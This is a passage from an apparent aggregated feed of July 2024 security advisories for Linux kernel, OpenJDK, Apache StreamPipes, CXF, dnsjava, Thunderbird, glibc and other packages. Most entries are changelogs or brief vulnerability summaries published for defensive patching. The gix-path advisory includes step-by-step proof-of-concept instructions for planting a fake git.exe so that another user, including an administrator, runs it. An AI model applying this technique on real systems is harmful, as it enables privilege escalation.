18.07.2024 03:00:00	oraclelinux	[ELSA-2024-4568] java-17-openjdk security update (important)	[1:17.0.12.0.7-2.0.1]- Add Oracle vendor bug URL[1:17.0.12.0.7-2]- Update to jdk-17.0.12+7 (GA)- Update .gitignore to ignore openjdk-17.0.12+7.tar.xz- Sync java-17-openjdk-portable.specfile- Set buildver to 7- Set portablerelease 1- Set is_ga to 1- Update sources to openjdk-17.0.12+7.tar.xz- Resolves: RHEL-46641- Resolves: RHEL-47019- This tarball is embargoed until 2024-07-16 @ 1pm PT. [1:17.0.12.0.6-0.1.ea]- Add debuginfo section to rpminspect.yaml (OPENJDK-2904)- Add unicode section to rpminspect.yaml (OPENJDK-2904)[1:17.0.12.0.6-0.1.ea]- Add upstream patch that removes illegal RLO Unicode characters (JDK-8332174)- Sync the copy of the portable specfile with the latest update[1:17.0.12.0.6-0.1.ea]- Delete fips-17u-d63771ea660.patch- Add fips-17u-e893be00150.patch- Update fipsver to e893be00150[1:17.0.12.0.6-0.1.ea]- generate_source_tarball.sh: Use tar exclude options for VCS files- generate_source_tarball.sh: Improve VCS exclusion[1:17.0.12.0.6-0.1.ea]- generate_source_tarball.sh: Update examples in header for clarity- generate_source_tarball.sh: Cleanup message issued when checkout already exists- generate_source_tarball.sh: Create directory in TMPDIR when using WITH_TEMP- generate_source_tarball.sh: Only add --depth=1 on non-local repositories- icedtea_sync.sh: Reinstate from rhel-8.9.0 branch- Move maintenance scripts to a scripts subdirectory- discover_trees.sh: Set compile-command and indentation instructions for Emacs- discover_trees.sh: shellcheck: Do not use -o (SC2166)- discover_trees.sh: shellcheck: Remove x-prefixes since we use Bash (SC2268)- discover_trees.sh: shellcheck: Double-quote variable references (SC2086)- generate_source_tarball.sh: Add authorship- icedtea_sync.sh: Set compile-command and indentation instructions for Emacs- icedtea_sync.sh: shellcheck: Double-quote variable references (SC2086)- icedtea_sync.sh: shellcheck: Remove x-prefixes since we use Bash (SC2268)- openjdk_news.sh: Set compile-command and indentation instructions for Emacs- openjdk_news.sh: shellcheck: Double-quote variable references (SC2086)- openjdk_news.sh: shellcheck: Remove x-prefixes since we use Bash (SC2268)- openjdk_news.sh: shellcheck: Remove deprecated egrep usage (SC2196)- generate_source_tarball.sh: Output values of new options WITH_TEMP and OPENJDK_LATEST- generate_source_tarball.sh: Double-quote DEPTH reference (SC2086)- generate_source_tarball.sh: Avoid empty DEPTH reference while still appeasing shellcheck[1:17.0.12.0.6-0.1.ea]- Update to jdk-17.0.12+6 (EA)- Add openjdk-17.0.12+6-ea.tar.xz to .gitignore- Set updatever to 12- Set buildver to 6- Set rpmrelease to 1- Set is_ga to 0- Update sources to openjdk-17.0.12+6-ea.tar.xz- Require tzdata-java 2024a at runtime and for build (JDK-8325150)- Update lcms2 bundled provides to 2.16.0- Add zlib 1.3.1 bundled provides and zlib-devel build requirement (OPENJDK-3065)- Label as error a designator mismatch- Change a fix-me comment to a note instead- Sync generate_source_tarball.sh from Fedora rawhide	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4568
18.07.2024 03:00:00	oraclelinux	[ELSA-2024-4573] java-21-openjdk security update (important)	[1:21.0.4.0.7-1.0.1]- Add Oracle vendor bug URL [Orabug: 34340155][1:21.0.4.0.7-1]- Update to jdk-21.0.4+7 (GA)- Update release notes to 21.0.4+7- Switch to GA mode.- Sync the copy of the portable specfile with the latest update- Add missing section headers in NEWS- This tarball is embargoed until 2024-07-16 @ 1pm PT. - Resolves: RHEL-47022[1:21.0.4.0.5-0.1.ea]- Update to jdk-21.0.4+5 (EA)- Update release notes to 21.0.4+5- Limit Java only tests to one architecture using jdk_test_arch- Actually require tzdata 2024a now it is available in the buildroot- Resolves: RHEL-45356- Resolves: RHEL-47399[1:21.0.4.0.1-0.1.ea]- Update to jdk-21.0.4+1 (EA)- Update release notes to 21.0.4+1- Switch to EA mode- Bump LCMS 2 version to 2.16.0 following JDK-8321489- Add zlib build requirement or bundled version (1.3.1), depending on system_libs setting- Restore NEWS file so portable can be rebuilt- Sync the copy of the portable specfile with the latest update- Related: RHEL-45356- Resolves: RHEL-46028	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4573
18.07.2024 03:00:00	oraclelinux	[ELSA-2024-4583] kernel security update (important)	- [5.14.0-427.26.1_4.OL9]- Disable UKI signing [Orabug: 36571828]- Update Oracle Linux certificates (Kevin Lyons)- Disable signing for aarch64 (Ilya Okomin)- Oracle Linux RHCK Module Signing Key was added to the kernel trusted keys list (olkmod_signing_key.pem) [Orabug: 29539237]- Update x509.genkey [Orabug: 24817676]- Conflict with shim-ia32 and shim-x64 <= 15.3-1.0.5- Remove upstream reference during boot (Kevin Lyons) [Orabug: 34729535]- Add Oracle Linux IMA certificates[5.14.0-427.26.1_4]- net: ena: Fix incorrect descriptor free behavior (Kamal Heib) [RHEL-39217 RHEL-37430] {CVE-2024-35958}- tcp: Use refcount_inc_not_zero() in tcp_twsk_unique(). (Guillaume Nault) [RHEL-41749 RHEL-39837] {CVE-2024-36904}- mm/mglru: Revert 'don't sync disk for each aging cycle' (Waiman Long) [RHEL-44418]- tipc: fix UAF in error path (Xin Long) [RHEL-34848 RHEL-34280] {CVE-2024-36886}- selftest/cgroup: Update test_cpuset_prs.sh to match changes (Waiman Long) [RHEL-45139]- cgroup/cpuset: Make cpuset.cpus.exclusive independent of cpuset.cpus (Waiman Long) [RHEL-45139]- cgroup/cpuset: Delay setting of CS_CPU_EXCLUSIVE until valid partition (Waiman Long) [RHEL-45139]- selftest/cgroup: Fix test_cpuset_prs.sh problems reported by test robot (Waiman Long) [RHEL-45139]- cgroup/cpuset: Fix remote root partition creation problem (Waiman Long) [RHEL-45139]- cgroup/cpuset: Optimize isolated partition only generate_sched_domains() calls (Waiman Long) [RHEL-45139]- cgroup/cpuset: Fix retval in update_cpumask() (Waiman Long) [RHEL-45139]- cgroup/cpuset: Fix a memory leak in update_exclusive_cpumask() (Waiman Long) [RHEL-45139]- ice: implement AQ download pkg retry (Petr Oros) [RHEL-38907 RHEL-17318]- redhat: include resolve_btfids in kernel-devel (Viktor Malik) [RHEL-43426 RHEL-40707]- blk-cgroup: fix list corruption from resetting io stat (cki-backport-bot) [RHEL-44977] {CVE-2024-38663}- misc: rtsx: do clear express reg every SD_INT (David Arcari) [RHEL-39985 RHEL-33706]- misc: rtsx: Fix rts5264 driver status incorrect when card removed (David Arcari) [RHEL-39985 RHEL-33706]- netfilter: tproxy: bail out if IP has been disabled on the device (cki-backport-bot) [RHEL-44371] {CVE-2024-36270}- lib/test_hmm.c: handle src_pfns and dst_pfns allocation failure (cki-backport-bot) [RHEL-44263 RHEL-44261] {CVE-2024-38543}- r8169: Fix possible ring buffer corruption on fragmented Tx packets. (cki-backport-bot) [RHEL-44039] {CVE-2024-38586}- net: micrel: Fix receiving the timestamp in the frame for lan8841 (cki-backport-bot) [RHEL-43996] {CVE-2024-38593}- vt: fix memory overlapping when deleting chars in the buffer (Waiman Long) [RHEL-43379 RHEL-27780] {CVE-2022-48627}- net/mlx5e: Use a memory barrier to enforce PTP WQ xmit submission tracking occurs after populating the metadata_map (Kamal Heib) [RHEL-42728 RHEL-34192] {CVE-2024-26858}- locking/atomic: Make test_and_*_bit() ordered on failure (Paolo Bonzini) [RHEL-45896]- mm/vmscan: fix a bug calling wakeup_kswapd() with a wrong zone index (Rafael Aquini) [RHEL-42659 RHEL-31840] {CVE-2024-26783}- can: j1939: prevent deadlock by changing j1939_socks_lock to rwlock (Jose Ignacio Tornos Martinez) [RHEL-42379 RHEL-31530] {CVE-2023-52638}- ethernet: hisilicon: hns: hns_dsaf_misc: fix a possible array overflow in hns_dsaf_ge_srst_by_port() (Ken Cox) [RHEL-42226 RHEL-38715] {CVE-2021-47548}[5.14.0-427.25.1_4]- nvme: fix reconnection fail due to reserved tag allocation (Maurizio Lombardi) [RHEL-42896 RHEL-36896] {CVE-2024-27435}- net: hns3: fix use-after-free bug in hclgevf_send_mbx_msg (cki-backport-bot) [RHEL-43625] {CVE-2021-47596}- scsi: sg: Avoid race in error handling & drop bogus warn (Ewan D. Milne) [RHEL-36106 RHEL-35659]- scsi: sg: Avoid sg device teardown race (Ewan D. Milne) [RHEL-36106 RHEL-35659]- netfilter: nf_tables: use timestamp to check for set element timeout (Florian Westphal) [RHEL-38032 RHEL-33985] {CVE-2024-27397}- netfilter: nft_set_rbtree: Remove unused variable nft_net (Florian Westphal) [RHEL-38032 RHEL-33985]- netfilter: nft_set_rbtree: prefer sync gc to async worker (Florian Westphal) [RHEL-38032 RHEL-33985]- netfilter: nft_set_rbtree: rename gc deactivate+erase function (Florian Westphal) [RHEL-38032 RHEL-33985]- netfilter: nf_tables: de-constify set commit ops function argument (Florian Westphal) [RHEL-38032 RHEL-33985]- octeontx2-af: avoid off-by-one read from userspace (Kamal Heib) [RHEL-40486 RHEL-39873] {CVE-2024-36957}	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4583
18.07.2024 19:46:06	rustsec	[RUSTSEC-2024-0355] gix-path can use a fake program files location (medium)	### SummaryWhen looking for Git for Windows so it can run it to report its paths, `gix-path` can be tricked into running another `git.exe` placed in an untrusted location by a limited user account.### DetailsWindows permits limited user accounts without administrative privileges to create new directories in the root of the system drive. While `gix-path` first looks for `git` using a `PATH` search, in version 0.10.8 it also has a fallback strategy on Windows of checking [two hard-coded paths](https://github.com/Byron/gitoxide/blob/6cd8b4665bb7582f744c3244abaef812be39ec35/gix-path/src/env/git.rs#L9-L14) intended to be the 64-bit and 32-bit Program Files directories:```rust/// Other places to find Git in.#[cfg(windows)]pub(super) static ALTERNATIVE_LOCATIONS: &[&str] = &[ "C:/Program Files/Git/mingw64/bin", "C:/Program Files (x86)/Git/mingw32/bin",];```Existing functions, as well as the newly introduced `exe_invocation` function, were updated to make use of these alternative locations. This causes facilities in `gix_path::env` to directly execute `git.exe` in those locations, as well as to return its path or whatever configuration it reports to callers who rely on it.Although unusual setups where the system drive is not `C:`, or even where Program Files directories have non-default names, are technically possible, the main problem arises on a 32-bit Windows system. Such a system has no `C:\Program Files (x86)` directory.A limited user on a 32-bit Windows system can therefore create the `C:\Program Files (x86)` directory and populate it with arbitrary contents. Once a payload has been placed at the second of the two hard-coded paths in this way, other user accounts including administrators will execute it if they run an application that uses `gix-path` and do not have `git` in a `PATH` directory.(While having `git` found in a `PATH` search prevents exploitation, merely having it installed in the default location under the real `C:\Program Files` directory does not. This is because the first hard-coded path's `mingw64` component assumes a 64-bit installation.)### PoCOn a 32-bit (x86) Windows 10 system, with or without Git for Windows installed:1. Create a limited user account in `lusrmgr.msc` or the Settings application.2. Log in with that account and, using Windows Explorer or the `mkdir` command in PowerShell, create the directories `C:\Program Files (x86)\Git\mingw32\bin`. Although a limited user account cannot create regular files directly in `C:\`, it can create directories including one called `Program Files (x86)`.3. Place a copy of `C:\Windows\system32\calc.exe` in `C:\Program Files (x86)\Git\mingw32\bin` and rename it from `calc.exe` to `git.exe`. A different test payload may be used if preferred, and the executable need not already be signed or trusted.4. Log out, and log in as a different user. This user may be an administrator.5. If `gitoxide` is not installed, install it. If `cargo install gitoxide` is used for the installation, then the version of `gix-path` used in the installation can be observed.6. The vulnerability is only exploitable if `git` cannot be found in a `PATH` search. So, in PowerShell, run `gcm git` to check if `git` is present in the `PATH`. If so, temporarily remove it. One way to do this is for the current shell only, by running `$env:PATH` to inspect it and by assigning `$env:PATH = '...'` where `...` omits directories that contain `git`.7. Some commands that can be run outside a repository, and most commands that can be run inside a repository, will run the Calculator or other payload at least once per invocation. Try `gix clone foo` or, inside of a repository, `gix status`, `gix config`, `gix is-changed`, `gix fetch`, `ein t hours`, or `ein t query`. This is not exhaustive; most other `gix` and `ein` commands that access existing repository state or a network resource likewise run the payload.### ImpactOnly Windows is affected. Exploitation is unlikely except on a 32-bit system. In particular, running a 32-bit build on a 64-bit system is not a risk factor. Furthermore, the attacker must have a user account on the system, though it may be a relatively unprivileged account. Such a user can perform privilege escalation and execute code as another user, though it may be difficult to do so reliably because the targeted user account must run an application or service that uses `gix-path` and must not have `git` in its `PATH`.The main exploitable configuration is one where Git for Windows has been installed but not added to `PATH`. This is one of the options in its installer, though not the default option. Alternatively, an affected program that sanitizes its `PATH` to remove seemingly nonessential directories could allow exploitation. But for the most part, if the target user has configured a `PATH` in which the real `git.exe` can be found, then this cannot be exploited.This vulnerability is comparable to [CVE-2022-24765](https://github.com/git-for-windows/git/security/advisories/GHSA-vw2c-22j4-2fh2), in which an uncontrolled path like `C:\.git\config`, which a limited user can create, could supply configuration used by other users. However, in this case, exploitation is slightly simpler because, rather than using configuration, an executable is directly run.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0355
18.07.2024 23:21:22	maven	[MAVEN:GHSA-6523-JF4R-C962] Apache StreamPipes has potential remote code execution (RCE) via file upload (high)	Unrestricted Upload of File with dangerous type vulnerability in Apache StreamPipes.Such a dangerous type might be an executable file that may lead to a remote code execution (RCE).The unrestricted upload is only possible for authenticated and authorized users.This issue affects Apache StreamPipes: through 0.93.0.Users are recommended to upgrade to version 0.95.0, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6523-JF4R-C962
18.07.2024 23:19:48	maven	[MAVEN:GHSA-9GR7-GH74-QG9X] Apache StreamPipes has possibility of SSRF in pipeline element installation process (moderate)	Server-Side Request Forgery (SSRF) vulnerability in Apache StreamPipes during installation process of pipeline elements.Previously, StreamPipes allowed users to configure custom endpoints from which to install additional pipeline elements. These endpoints were not properly validated, allowing an attacker to get StreamPipes to send an HTTP GET request to an arbitrary address.This issue affects Apache StreamPipes: through 0.93.0.Users are recommended to upgrade to version 0.95.0, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9GR7-GH74-QG9X
18.07.2024 23:16:27	maven	[MAVEN:GHSA-2QPH-V9P2-Q2GV] Apache StreamPipes potentially allows creation of multiple identical accounts (moderate)	Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Apache StreamPipes in user self-registration.This allows an attacker to potentially request the creation of multiple accounts with the same email address until the email address is registered, creating many identical users and corrupting StreamPipe's user management.This issue affects Apache StreamPipes: through 0.93.0.Users are recommended to upgrade to version 0.95.0, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2QPH-V9P2-Q2GV
18.07.2024 17:15:35	almalinux	[ALSA-2024:4568] java-17-openjdk security update (important)	java-17-openjdk security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4568
18.07.2024 17:17:58	almalinux	[ALSA-2024:4573] java-21-openjdk security update (important)	java-21-openjdk security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4573
18.07.2024 14:24:58	rustsec	[RUSTSEC-2024-0354] Usage of non-constant time base64 decoder could lead to leakage of secret key material (low)	Versions before 0.7.0 of vodozemac use a non-constant time base64 implementationfor importing key material for Megolm group sessions and `PkDecryption` Ed25519secret keys. This flaw might allow an attacker to infer some information aboutthe secret key material through a side-channel attack.## ImpactThe use of a non-constant time base64 implementation might allow an attacker toobserve timing variations in the encoding and decoding operations of the secretkey material. This could potentially provide insights into the underlying secretkey material.The impact of this vulnerability is considered low because exploiting theattacker is required to have access to high precision timing measurements, aswell as repeated access to the base64 encoding or decoding processes.Additionally, the estimated leakage amount is bounded and low according to thereferenced paper[[1]].[1]: https://arxiv.org/abs/2108.04600	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0354
19.07.2024 13:36:03	ubuntu	[USN-6896-4] Linux kernel vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6896-4
19.07.2024 12:36:36	ubuntu	[USN-6898-3] Linux kernel kernel vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6898-3
19.07.2024 21:34:57	maven	[MAVEN:GHSA-4MGG-FQFQ-64HG] Apache CXF allows unrestricted memory consumption in CXF HTTP clients (low)	In versions of Apache CXF before 3.6.4 and 4.0.5 (3.5.x and lower versions are not impacted), a CXF HTTP client conduit may prevent HTTPClient instances from being garbage collected and it is possible that memory consumption will continue to increase, eventually causing the application to run out of memory	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4MGG-FQFQ-64HG
19.07.2024 21:34:50	maven	[MAVEN:GHSA-6PFF-FMH2-4MMF] Apache CXF Denial of Service vulnerability in JOSE (moderate)	An improper input validation of the p2c parameter in the Apache CXF JOSE code before 4.0.5, 3.6.4 and 3.5.9 allows an attacker to perform a denial of service attack by specifying a large value for this parameter in a token.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6PFF-FMH2-4MMF
19.07.2024 21:34:45	maven	[MAVEN:GHSA-5M3J-PXH7-455P] Apache CXF: SSRF vulnerability via WADL stylesheet parameter (high)	A SSRF vulnerability in WADL service description in versions of Apache CXF before 4.0.5, 3.6.4 and 3.5.9 allows an attacker to perform SSRF style attacks on REST webservices. The attack only applies if a custom stylesheet parameter is configured.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5M3J-PXH7-455P
19.07.2024 12:04:56	ubuntu	[USN-6895-3] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6895-3
19.07.2024 13:24:45	almalinux	[ALSA-2024:4620] libndp security update (important)	libndp security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4620
19.07.2024 13:26:59	almalinux	[ALSA-2024:4617] qt5-qtbase security update (important)	qt5-qtbase security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4617
19.07.2024 13:20:07	almalinux	[ALSA-2024:4635] thunderbird security update (important)	thunderbird security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4635
19.07.2024 13:19:10	almalinux	[ALSA-2024:4636] libndp security update (important)	libndp security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4636
19.07.2024 13:23:11	almalinux	[ALSA-2024:4623] qt5-qtbase security update (important)	qt5-qtbase security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4623
19.07.2024 13:21:37	almalinux	[ALSA-2024:4624] thunderbird security update (important)	thunderbird security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4624
19.07.2024 13:11:38	rustsec	[RUSTSEC-2024-0356] `UserIdentity::is_verified` not checking verification status of own user identity while performing the check (medium)	The `UserIdentity::is_verified()` method in the matrix-sdk-crypto crate beforeversion 0.7.2 doesn't take into account the verification status of the user'sown identity while performing the check and may as a result return a valuecontrary to what is implied by its name and documentation.## ImpactIf the method is used to decide whether to perform sensitive operations towardsa user identity, a malicious homeserver could manipulate the outcome in order tomake the identity appear trusted. This is not a typical usage of the method,which lowers the impact. The method itself is not used inside thematrix-sdk-crypto crate.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0356
19.07.2024 03:00:00	freebsd	[FREEBSD:574028B4-A181-455B-A78B-EC5C62781235] electron29 -- multiple vulnerabilities (high)	Electron developers report: This update fixes the following vulnerabilities: Security: backported fix for CVE-2024-6291. Security: backported fix for CVE-2024-6293. Security: backported fix for CVE-2024-6290. Security: backported fix for CVE-2024-6292.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:574028B4-A181-455B-A78B-EC5C62781235
21.07.2024 20:28:48	rustsec	[RUSTSEC-2024-0357] `MemBio::get_buf` has undefined behavior with empty buffers	Previously, `MemBio::get_buf` called `slice::from_raw_parts` with a null-pointer, which violates the functions invariants, leading to undefined behavior. In debug builds this would produce an assertion failure. This is now fixed.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0357
22.07.2024 20:30:20	maven	[MAVEN:GHSA-CRJG-W57M-RQQF] DNSJava vulnerable to KeyTrap - Denial-of-Service Algorithmic Complexity Attacks (moderate)	### ImpactUsers using the `ValidatingResolver` for DNSSEC validation can run into CPU exhaustion with specially crafted DNSSEC-signed zones.### PatchesUsers should upgrade to dnsjava v3.6.0### WorkaroundsAlthough not recommended, only using a non-validating resolver, will remove the vulnerability. ### Referenceshttps://www.athene-center.de/en/keytrap	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CRJG-W57M-RQQF
22.07.2024 18:30:56	maven	[MAVEN:GHSA-MMWX-RJ87-VFGR] DNSJava affected by KeyTrap - NSEC3 closest encloser proof can exhaust CPU resources (moderate)	### ImpactUsers using the `ValidatingResolver` for DNSSEC validation can run into CPU exhaustion with specially crafted DNSSEC-signed zones.### PatchesUsers should upgrade to dnsjava v3.6.0### WorkaroundsAlthough not recommended, only using a non-validating resolver, will remove the vulnerability.### Referenceshttps://www.athene-center.de/en/keytrap	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-MMWX-RJ87-VFGR
22.07.2024 19:55:12	maven	[MAVEN:GHSA-CFXW-4H78-H7FW] DNSJava DNSSEC Bypass (high)	### SummaryRecords in DNS replies are not checked for their relevance to the query, allowing an attacker to respond with RRs from different zones.### DetailsDNS Messages are not authenticated. They do not guarantee that- received RRs are authentic- not received RRs do not exist- all or any received records in a response relate to the requestApplications utilizing DNSSEC generally expect these guarantees to be met, however DNSSEC by itself only guarantees the first two.To meet the third guarantee, resolvers generally follow an (undocumented, as far as RFCs go) algorithm such as: (simplified, e.g. lacks DNSSEC validation!)1. denote by `QNAME` the name you are querying (e.g. fraunhofer.de.), and initialize a list of aliases2. if the ANSWER section contains a valid PTR RRSet for `QNAME`, return it (and optionally return the list of aliases as well)3. if the ANSWER section contains a valid CNAME RRSet for `QNAME`, add it to the list of aliases. Set `QNAME` to the CNAME's target and go to 2.4. Verify that `QNAME` does not have any PTR, CNAME and DNAME records using valid NSEC or NSEC3 records. Return `null`.Note that this algorithm relies on NSEC records and thus requires a considerable portion of the DNSSEC specifications to be implemented. For this reason, it cannot be performed by a DNS client (aka application) and is typically performed as part of the resolver logic.dnsjava does not implement a comparable algorithm, and the provided APIs instead return either- the received DNS message itself (e.g. when using a ValidatingResolver such as in [this](https://github.com/dnsjava/dnsjava/blob/master/EXAMPLES.md#dnssec-resolver) example), or- essentially just the contents of its ANSWER section (e.g. when using a LookupSession such as in [this](https://github.com/dnsjava/dnsjava/blob/master/EXAMPLES.md#simple-lookup-with-a-resolver) example)If applications blindly filter the received results for RRs of the desired record type (as seems to be typical usage for dnsjava), a rogue recursive resolver or (on UDP/TCP connections) a network attacker can- In addition to the actual DNS response, add RRs irrelevant to the query but of the right datatype, e.g. from another zone, as long as that zone is correctly using DNSSEC, or- completely exchange the relevant response records### ImpactDNS(SEC) libraries are usually used as part of a larger security framework.Therefore, the main misuses of this vulnerability concern application code, which might take the returned records as authentic answers to the request.Here are three concrete examples of where this might be detrimental:- [RFC 6186](https://datatracker.ietf.org/doc/html/rfc6186) specifies that to connect to an IMAP server for a user, a mail user agent should retrieve certain SRV records and send the user's credentials to the specified servers. Exchanging the SRV records can be a tool to redirect the credentials.- When delivering mail via SMTP, MX records determine where to deliver the mails to. Exchanging the MX records might lead to information disclosure. Additionally, an exchange of TLSA records might allow attackers to intercept TLS traffic.- Some research projects like [LIGHTest](https://www.lightest.eu/) are trying to manage CA trust stores via URI and SMIMEA records in the DNS. Exchanging these allows manipulating the root of trust for dependent applications.### MitigationsAt this point, the following mitigations are recommended:- When using a ValidatingResolver, ignore any Server indications of whether or not data was available (e.g. NXDOMAIN, NODATA, ...).- For APIs returning RRs from DNS responses, filter the RRs using an algorithm such as the one above. This includes e.g. `LookupSession.lookupAsync`.- Remove APIs dealing with raw DNS messages from the examples section or place a noticable warning above.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CFXW-4H78-H7FW
22.07.2024 17:30:29	ubuntu	[USN-6904-1] PyMongo vulnerability (high)	PyMongo could be made to crash or expose sensitive information if itreceived a crafted BSON.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6904-1
22.07.2024 21:43:42	maven	[MAVEN:GHSA-8PXV-X6JQ-5VW9] Apache Syncope Improper Input Validation vulnerability (moderate)	When editing a user, group or any object in the Syncope Console, HTML tags could be added to any text field and could lead to potential exploits.The same vulnerability was found in the Syncope Enduser, when editing "Personal Information" or "User Requests".Users are recommended to upgrade to version 3.0.8, which fixes this issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8PXV-X6JQ-5VW9
23.07.2024 00:57:53	maven	[MAVEN:GHSA-Q9W2-H4CW-8GHP] Apache RocketMQ Vulnerable to Unauthorized Exposure of Sensitive Data (moderate)	For RocketMQ versions 5.2.0 and below, under certain conditions, there is a risk of exposure of sensitive Information to an unauthorized actor even if RocketMQ is enabled with authentication and authorization functions.An attacker, possessing regular user privileges or listed in the IP whitelist, could potentially acquire the administrator's account and password through specific interfaces. Such an action would grant them full control over RocketMQ, provided they have access to the broker IP address list.To mitigate these security threats, it is strongly advised that users upgrade to version 5.3.0 or newer. Additionally, we recommend users to use RocketMQ ACL 2.0 instead of the original RocketMQ ACL when upgrading to version Apache RocketMQ 5.3.0.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-Q9W2-H4CW-8GHP
22.07.2024 05:59:38	ubuntu	[USN-6903-1] Thunderbird vulnerabilities (critical)	Several security issues were fixed in Thunderbird.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6903-1
22.07.2024 17:42:25	maven	[MAVEN:GHSA-W36W-948J-XHFW] H2O vulnerable to Deserialization of Untrusted Data (high)	The H2O machine learning platform uses "Iced" classes as the primary means of moving Java Objects around the cluster. The Iced format supports inclusion of serialized Java objects. When a model is deserialized, any class is allowed to be deserialized (no class whitelist). An attacker can construct a crafted Iced model that uses Java gadgets and leads to arbitrary code execution when imported to the H2O platform.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-W36W-948J-XHFW
22.07.2024 00:41:17	composer	[PHP:SILVERSTRIPE-FRAMEWORK-2024-32981] CVE-2024-32981 - XSS Vulnerability with text/html base64-encoded payload (medium)		https://secdb.nttzen.cloud/security-advisory/composer/PHP:SILVERSTRIPE-FRAMEWORK-2024-32981
22.07.2024 00:41:17	composer	[PHP:SILVERSTRIPE-FRAMEWORK-SS-2024-001] SS-2024-001 - TinyMCE allows svg files linked in object tags		https://secdb.nttzen.cloud/security-advisory/composer/PHP:SILVERSTRIPE-FRAMEWORK-SS-2024-001
22.07.2024 00:41:17	composer	[PHP:SILVERSTRIPE-REPORTS-2024-29885] CVE-2024-29885 - Reports are still accessible even when canView is set to false (medium)		https://secdb.nttzen.cloud/security-advisory/composer/PHP:SILVERSTRIPE-REPORTS-2024-29885
23.07.2024 23:39:26	ubuntu	[USN-6910-1] Apache ActiveMQ vulnerabilities (critical)	Several security issues were fixed in Apache ActiveMQ.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6910-1
23.07.2024 22:09:25	slackware	[SSA:2024-205-03] mozilla-thunderbird (critical)	New mozilla-thunderbird packages are available for Slackware 15.0 tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-thunderbird-115.13.0-i686-1_slack15.0.txz: Upgraded. This release contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/thunderbird/115.13.0/releasenotes/ https://www.mozilla.org/en-US/security/advisories/mfsa2024-31/ https://www.cve.org/CVERecord?id=CVE-2024-6600 https://www.cve.org/CVERecord?id=CVE-2024-6601 https://www.cve.org/CVERecord?id=CVE-2024-6602 https://www.cve.org/CVERecord?id=CVE-2024-6603 https://www.cve.org/CVERecord?id=CVE-2024-6604 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-115.13.0-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-115.13.0-x86_64-1_slack15.0.txzMD5 signaturesSlackware 15.0 package:5a94fb8c8ef1abe421365be729502d02 mozilla-thunderbird-115.13.0-i686-1_slack15.0.txzSlackware x86_64 15.0 package:1922a1ac45a5e3bb495ac45640b27f8b mozilla-thunderbird-115.13.0-x86_64-1_slack15.0.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-thunderbird-115.13.0-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-205-03
23.07.2024 22:09:08	slackware	[SSA:2024-205-02] glibc (high)	New glibc packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/aaa_glibc-solibs-2.33-i586-7_slack15.0.txz: Rebuilt.patches/packages/glibc-2.33-i586-7_slack15.0.txz: Rebuilt. This update fixes security issues: nscd: Stack-based buffer overflow in netgroup cache. nscd: Null pointer crash after notfound response. nscd: netgroup cache may terminate daemon on memory allocation failure. nscd: netgroup cache assumes NSS callback uses in-buffer strings. These vulnerabilities were only present in the nscd binary. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-33599 https://www.cve.org/CVERecord?id=CVE-2024-33600 https://www.cve.org/CVERecord?id=CVE-2024-33601 https://www.cve.org/CVERecord?id=CVE-2024-33602 (* Security fix )patches/packages/glibc-i18n-2.33-i586-7_slack15.0.txz: Rebuilt.patches/packages/glibc-profile-2.33-i586-7_slack15.0.txz: Rebuilt.```Where to find the new packagesThanks to the friendly folks at the 